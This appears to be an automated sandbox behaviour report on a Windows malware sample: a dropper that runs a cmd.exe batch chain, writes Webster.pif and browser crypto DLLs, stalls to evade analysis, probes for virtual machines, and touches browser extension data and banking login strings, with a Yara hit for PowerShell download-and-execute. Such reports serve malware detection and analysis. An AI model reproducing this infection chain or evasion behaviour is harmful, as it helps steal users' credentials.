                        Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: napinsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: pnrpnsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wshbth.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: nlaapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: winrnr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: rstrtmgr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: dbghelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: mozglue.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: mozglue.pdbP source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                        Source: Binary string: freebl3.pdb source: Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: freebl3.pdbp source: Webster.pif, 0000000B.00000002.3329824044.00000000138F2000.00000004.00000800.00020000.00000000.sdmp, freebl3.dll.11.dr
                        Source: Binary string: nss3.pdb@ source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: softokn3.pdb@ source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Webster.pif, 0000000B.00000002.3339217037.000000002B6B6000.00000004.00000800.00020000.00000000.sdmp, vcruntime140.dll.11.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: Webster.pif, 0000000B.00000002.3334527572.000000001F7DA000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.11.dr
                        Source: Binary string: nss3.pdb source: Webster.pif, 0000000B.00000002.3341559504.0000000031623000.00000004.00000800.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3346549981.000000006CA8F000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.11.dr
                        Source: Binary string: mozglue.pdb source: Webster.pif, 0000000B.00000002.3346342228.000000006C8CD000.00000002.00000001.01000000.00000009.sdmp, Webster.pif, 0000000B.00000002.3332106889.000000001986D000.00000004.00000800.00020000.00000000.sdmp, mozglue.dll.11.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: Webster.pif, 0000000B.00000002.3327037211.000000000CA58000.00000002.00001000.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3327299901.000000000CE97000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: softokn3.pdb source: Webster.pif, 0000000B.00000002.3336965494.000000002574B000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                        Source: freebl3.dll.11.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.11.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.11.drStatic PE information: section name: .didat
                        Source: softokn3.dll.11.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.11.drStatic PE information: section name: .00cfg
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA8B75 push ecx; ret 11_2_00AA8B88

                        Persistence and Installation Behavior

                        barindex
                        Drops PE files with a suspicious file extension
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\229536\Webster.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\229536\Webster.pifJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00B059B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_00B059B3
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A95EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00A95EDA
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AA33B7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00AA33B7
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Found stalling execution ending in API Sleep call
                        Source: C:\Users\user\Desktop\file.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifAPI coverage: 4.3 %
                        Source: C:\Windows\SysWOW64\timeout.exe TID: 4036Thread sleep count: 39 > 30Jump to behavior
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062D5 FindFirstFileW,FindClose,0_2_004062D5
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402E18 FindFirstFileW,0_2_00402E18
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406C9B
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE4005
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_00AE494A
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEC2FF
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AECD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_00AECD9F
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AECD14 FindFirstFileW,FindClose,11_2_00AECD14
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF5D8
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_00AEF735
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AEFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_00AEFA36
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00AE3CE2
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A95D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,11_2_00A95D13
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                        Source: Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWjj
                        Source: ECGDHD.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                        Source: ECGDHD.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                        Source: ECGDHD.11.drBinary or memory string: discord.comVMware20,11696487552f
                        Source: ECGDHD.11.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                        Source: ECGDHD.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                        Source: Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmp, Webster.pif, 0000000B.00000002.3321827446.0000000001854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: ECGDHD.11.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: tasks.office.comVMware20,11696487552o
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: global block list test formVMware20,11696487552
                        Source: Webster.pif, 0000000B.00000002.3322051688.0000000001ABC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware20,11696487552t
                        Source: ECGDHD.11.drBinary or memory string: AMC password management pageVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                        Source: ECGDHD.11.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: dev.azure.comVMware20,11696487552j
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                        Source: ECGDHD.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                        Source: ECGDHD.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                        Source: ECGDHD.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                        Source: ECGDHD.11.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                        Source: ECGDHD.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                        Source: Webster.pif, 0000000B.00000002.3321760579.0000000001795000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                        Source: ECGDHD.11.drBinary or memory string: outlook.office.comVMware20,11696487552s
                        Source: ECGDHD.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                        Source: ECGDHD.11.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                        Source: ECGDHD.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                        Source: ECGDHD.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                        Source: ECGDHD.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AF45D5 BlockInput,11_2_00AF45D5
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00A95240
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AB5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,11_2_00AB5CAC
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD88CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,11_2_00AD88CD
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AAA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00AAA385
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AAA354 SetUnhandledExceptionFilter,11_2_00AAA354
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifMemory protected: page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Yara detected Powershell download and execute
                        Source: Yara matchFile source: Process Memory Space: Webster.pif PID: 5740, type: MEMORYSTR
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AD9369 LogonUserW,11_2_00AD9369
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00A95240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,11_2_00A95240
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE1AC6 SendInput,keybd_event,11_2_00AE1AC6
                        Source: C:\Users\user\AppData\Local\Temp\229536\Webster.pifCode function: 11_2_00AE51E2 mouse_event,11_2_00AE51E2
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Fail Fail.cmd & Fail.cmd & exitJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
